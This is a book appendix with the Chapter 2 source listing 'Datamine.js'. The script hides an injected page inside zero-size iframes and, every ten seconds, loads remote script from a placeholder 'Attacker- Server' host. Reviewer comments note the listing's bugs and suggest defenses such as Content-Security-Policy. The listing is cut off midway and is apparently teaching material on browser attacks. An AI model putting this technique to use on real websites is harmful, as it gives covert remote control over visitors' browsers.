Appendix A. Chapter 2 Source Code Samples

The following sections contain source code samples from Chapter 2.

Datamine.js

/**
 * spotter: book sample (Datamine.js) that re-hosts the current page inside a
 * set of iframes created by this script.
 *
 * As written it (1) copies the parent document's HTML, (2) overwrites
 * document.body with one full-size iframe and three zero-size iframes,
 * (3) schedules controlFrameFunction() every 10 seconds, and (4) writes the
 * copied page into the full-size frame with the first "Datamine.js"
 * occurrence replaced by "noresponse.js".
 *
 * Reviewer notes (defensive): presumably this is delivered through script
 * injection into the page (the chapter text is not shown here), so the
 * primary control is preventing that injection. Observable traits in the
 * listing are 0%-sized iframes added at runtime and a repeating script load
 * from the 'Attacker- Server' placeholder host. A Content-Security-Policy
 * without 'unsafe-eval' rejects the string form of setInterval used below.
 */
function spotter(){
  // Snapshot of the parent document's markup, taken before the body is replaced.
  var bigframe=parent.document.documentElement.innerHTML;

  // NOTE: iframeHTML is assigned without var, so it becomes an implicit global.
  // "Picture" is the only frame with a visible size (100% x 100%).
  iframeHTML='<IFRAME NAME="Picture" iframe id="Picture-id001" width="100%" height="100%" scrolling="auto" frameborder="0"></IFRAME>';
  // "Control", "Data" and "CrossDomain" are declared with 0% width and height.
  iframeHTML+='<IFRAME NAME="Control" iframe id="Control-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>';
  iframeHTML+='<IFRAME NAME="Data" iframe id="Data-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>';
  iframeHTML+='<IFRAME NAME="CrossDomain" iframe id="CrossDomain-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>';

  // Replaces the whole body of the current document with the four frames.
  document.body.innerHTML=iframeHTML;

  // String argument: the text is evaluated as code every 10000 ms.
  setInterval('controlFrameFunction()',10000);

  // NOTE(review): the markup above carries id="Picture-id001", not "Picture";
  // the "-id001" suffix may be an artifact of how this page was rendered.
  // Confirm against the printed listing.
  var victimFrame = document.getElementById('Picture');

  // String pattern, so only the first "Datamine.js" occurrence is replaced.
  var newVictimContents = bigframe.replace("Datamine.js","noresponse.js");

  // Write the modified copy of the original page into the visible frame.
  var newVictimFrame = victimFrame.contentWindow.document;
  newVictimFrame.open();
  newVictimFrame.write(newVictimContents);
  newVictimFrame.close();

  // document.all is a legacy, non-standard collection.
  document.all.Picture.style.visibility="visible";
}

/**
 * controlFrameFunction: invoked by the timer set in spotter(). The visible
 * part builds an HTML string containing a script tag whose src points at the
 * 'Attacker- Server' placeholder host and looks up the "Control" frame's
 * document. The listing is cut off after that point on this page, so what is
 * done with the string is not shown.
 */
function controlFrameFunction() {
  var controlFrameHTML = "<html><body>";
  // As printed, a closing script tag is appended before any opening one.
  controlFrameHTML += "</script>";
  // randomnumber is not defined anywhere in the visible listing; presumably it
  // varies the URL on each tick (verify against the full source).
  controlFrameHTML += "<script src='http://Attacker- Server/execute.js?trigger="+randomnumber+"'>";
  controlFrameHTML += "</script>";
  var controlFrame = document.getElementById('Control');
  var controlContents = controlFrameHTML;
  var newControlContents = controlFrame.contentWindow.document;
  // (listing truncated in the source from here)
  ...
